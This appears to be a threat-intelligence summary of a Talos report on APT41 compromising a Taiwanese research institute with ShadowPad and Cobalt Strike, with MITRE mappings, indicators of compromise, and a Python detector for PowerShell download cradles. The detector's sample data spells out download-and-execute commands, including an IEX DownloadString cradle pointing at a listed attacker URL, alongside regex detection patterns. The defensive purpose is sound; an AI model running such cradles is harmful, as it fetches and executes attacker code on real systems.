APT41 Likely Breached Taiwanese Government-Linked Research Institute Using ShadowPad and Cobalt Strike

Cisco Talos uncovered a campaign targeting a Taiwanese government-affiliated research institute attributed to APT41, employing ShadowPad and Cobalt Strike to conduct post-compromise activities after exploiting Microsoft Office vulnerabilities. The operation shows overlaps in tactics and infrastructure with prior campaigns, indicating a sophisticated and persistent threat actor. #ShadowPad #CobaltStrike #APT41 #Taiwan #MicrosoftOfficeIME #CVE2018-0824

Key Points

  • Malicious campaign uncovered by Cisco Talos targeting a Taiwanese government-affiliated research institute.
  • Attribution to APT41 with medium confidence, based on overlaps in TTPs, infrastructure, and malware families.
  • ShadowPad and Cobalt Strike used for post-compromise activities, including multiple deployment methods (webshells, RDP, reverse shell).
  • Exploitation of an outdated Microsoft Office IME binary (loader) and CVE-2018-0824-based payloads (UnmarshalPwn).
  • Credential harvesting with Mimikatz and WebBrowserPassView; abnormal PowerShell activity observed for script delivery.
  • Evidence of prior TTPs/infrastructure overlaps with earlier campaigns, including shared loaders and C2 patterns.
  • Two iterations of ShadowPad loaders and a Go-based Cobalt Strike anti-AV loader indicate targeted, China-linked tooling.

MITRE Techniques

  • [T1003] Credential Dumping – Mimikatz is used to dump password hashes from the memory of the lsass process, and WebBrowserPassView to recover credentials saved in web browsers. ‘The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to extract stored credentials from web browsers.’
  • [T1059.001] PowerShell – Abnormal PowerShell commands are used to download and execute scripts. ‘abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts.’
  • [T1105] Remote File Copy – PowerShell commands download malicious files from remote servers. ‘Used PowerShell commands to download malicious files from remote servers.’
  • [T1021.001] Remote Services (RDP) – Initial compromise and malware deployment occur via RDP access. ‘Exploited RDP access for initial compromise and malware deployment.’
  • [T1071] Command and Control – The malware establishes communication with C2 servers for execution and exfiltration. ‘Established communication with C2 servers for malware execution and data exfiltration.’
  • [T1574.002] DLL Side-Loading – ShadowPad loaders sideload a DLL via a legitimate Bitdefender binary to probe memory and inject. ‘ShadowPad loaders… sideloading technique… using an eleven year old executable to sideload the DLL-based ShadowPad loader.’
  • [T1068] Privilege Escalation – Exploitation of CVE-2018-0824 for local privilege escalation. ‘Exploited CVE-2018-0824 for local privilege escalation.’
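As an added defensive example (not code from the Talos report or this summary), the following Python scores PowerShell command lines for the download-and-execute pattern described under T1059.001 and T1105: a download primitive chained with an execution primitive, a literal IP address as the host, and a scheme/port mismatch such as the page's `http://…:443` endpoint. The sample telemetry lines are constructed; two reuse URLs from the IoC list, the others are benign or internal for contrast.

```python
import re
from ipaddress import ip_address

# Download primitives and execution primitives that get chained in a PowerShell
# download cradle. Matching is case-insensitive because PowerShell is.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|"
                         r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
EXEC_RE = re.compile(r"Invoke-Expression|\biex\b|-EncodedCommand|-enc\b|Start-Process|"
                     r"&\s*['\"]?[A-Za-z]:\\", re.I)
URL_RE = re.compile(r"(https?)://([^\s/:'\"]+)(?::(\d+))?(/[^\s'\")]*)?", re.I)

# Constructed sample process command lines (not from the report): the first two reuse
# URLs from the IoC section, the third is benign, the fourth is an internal-IP download.
SAMPLE_LINES = [
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://45.85.76.18:443/yPc1')\"",
    "powershell.exe -ep bypass -c \"Invoke-WebRequest https://www.nss.com.tw/p.ps1 -OutFile C:\\Users\\Public\\p.ps1; & C:\\Users\\Public\\p.ps1\"",
    "powershell.exe -Command \"Get-ChildItem C:\\Windows\\Temp\"",
    "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile('http://10.0.0.5/installer.msi','C:\\Temp\\i.msi')\"",
]

def is_ip(host):
    """True when the URL host is a literal IP address rather than a hostname."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def analyze(cmdline):
    """Score one PowerShell command line; a higher score means more cradle-like."""
    urls = URL_RE.findall(cmdline)
    f = {
        "urls": [f"{s}://{h}" + (f":{p}" if p else "") + path for s, h, p, path in urls],
        "download": bool(DOWNLOAD_RE.search(cmdline)),
        "execute": bool(EXEC_RE.search(cmdline)),
        "ip_host": any(is_ip(h) for _, h, _, _ in urls),
        # http on 443 or https on 80: scheme/port mismatch, as in the page's 45.85.76.18:443 IoC
        "scheme_port_mismatch": any((s.lower(), p) in (("http", "443"), ("https", "80"))
                                    for s, _, p, _ in urls),
    }
    f["score"] = (2 * f["download"] + 2 * f["execute"] + 3 * f["ip_host"]
                  + f["scheme_port_mismatch"] + bool(urls))
    return f

def triage(lines, threshold=5):
    """Return (score, line) pairs at or above the threshold, highest score first."""
    scored = [(analyze(line)["score"], line) for line in lines]
    return sorted((s, l) for s, l in scored if s >= threshold)[::-1]
```

Calling `triage(SAMPLE_LINES)` returns the two IoC-derived lines and the internal-IP download, with the `IEX`/`DownloadString` cradle to the raw IP ranked first; the weights are a starting point to tune against your own PowerShell telemetry.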

Indicators of Compromise

  • [IP Address] – 103.56.114.69, 103.96.131.84, and other IPs referenced as C2 or download hosts
  • [Domain] – w2.chatgptsfit[.]com – C2 domain used for beacon communication
  • [URL] – http://45.85.76.18:443/yPc1 – C2/download endpoint
  • [URL] – https://www.nss.com[.]tw/p.ps1 – PowerShell payload delivery
  • [URL] – https://www.nss.com[.]tw/1.hta – HTML application loader
  • [File] – imjp14k.dll – ShadowPad loader component
  • [File] – service.exe – ShadowPad loader component
  • [File] – imjp14k.dll.dat – ShadowPad payload
  • [Hash] – 2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
  • [Hash] – eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28

Read more: https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/